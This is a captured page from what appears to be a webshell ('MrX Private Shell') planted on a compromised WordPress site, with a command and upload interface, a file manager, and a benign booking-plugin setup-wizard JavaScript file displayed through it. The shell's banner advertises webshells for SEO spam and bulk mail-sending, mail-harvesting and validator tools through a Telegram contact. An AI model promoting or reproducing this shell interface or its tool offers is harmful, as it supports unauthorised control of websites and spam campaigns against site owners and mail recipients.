__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
"use strict";

// -----------------------------------------------------------------------------------------------------------------
// ==  Setup Wizard  -  Extend Settings Obj  -  '_wpbc_settings'  ==
// -----------------------------------------------------------------------------------------------------------------
/**
 * Extend _wpbc_settings with  new methods
 *
 * @type {*|{}}
 * @private
 */
 _wpbc_settings = (function ( obj, $) {
	 
	// -----------------------------------------------------------------------------------------------------------------
	// Setup Wizard Parameters
	// -----------------------------------------------------------------------------------------------------------------
	var p_setup_wizard = obj.setup_wizard_obj = obj.setup_wizard_obj || {
															// sort        : "booking_id",
															// page_num    : 1,
															// create_date : "",
															// keyword     : ""
														};
	obj.get_param__setup_wizard = function ( param_key ) {
		return p_setup_wizard[ param_key ];
	};
	obj.set_param__setup_wizard = function ( param_key, param_val ) {
		p_setup_wizard[ param_key ] = param_val;
	};
	// -------------------------------------------------------------
	obj.set_all_params__setup_wizard = function ( request_param_obj ) {
		p_setup_wizard = request_param_obj;
	};
	obj.get_all_params__setup_wizard = function () {
		return p_setup_wizard;
	};
	// -------------------------------------------------------------
	obj.set_params_arr__setup_wizard = function( params_arr ){
		_.each( params_arr, function ( p_val, p_key, p_data ){
			obj.set_param__setup_wizard( p_key, p_val );
		} );
	}

	return obj;
}( _wpbc_settings || {}, jQuery ));

Filemanager

Name Type Size Permission Actions
settings_obj.js File 2.85 KB 0640
setup_ajax.js File 6.15 KB 0640
setup_obj.js File 1.71 KB 0640
setup_page.css File 11.07 KB 0640
setup_show.js File 10.85 KB 0640
Filemanager